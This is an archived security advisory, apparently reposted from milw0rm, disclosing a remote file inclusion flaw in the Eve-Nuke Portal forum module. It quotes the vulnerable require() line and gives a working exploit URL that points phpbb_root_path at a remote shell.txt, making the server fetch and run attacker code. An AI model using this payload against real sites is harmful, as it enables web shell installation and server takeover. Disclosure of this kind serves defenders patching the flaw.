Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability

codebb 1.1b3  (phpbb_root_path )Remote File Include Vulnerability

Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities

JC URLshrink 1.3.1 Remote Code Execution Vulnerability

From:	ThE TiGeR <miro_tiger100_(at)_hotmail.com>
Date:	02.04.2007
Subject:	Eve-NukePortal file include (phpbb_root_path)

#================================================================================
===========
#Eve-NukePortal file include (phpbb_root_path)
#================================================================================
===========
#
#Script name :Eve-Nuke Portal
#
#Download script : http://puzzle.dl.sourceforge.net/sourceforge/eve-nuke/en-forums-beta.zip
#
#================================================================================
===========
#Vulnerable Code :
#
#require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx);
#
#================================================================================
===========
#Exploit :
#
#http://www.site.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.
site.com/shell.txt?
#
#================================================================================
===========
#
#Discoverd By : ThE TiGeR
#
#Contact : miro_tiger100[at]hotmail[dot]com
#
#================================================================================
===========

# milw0rm.com [2007-03-27]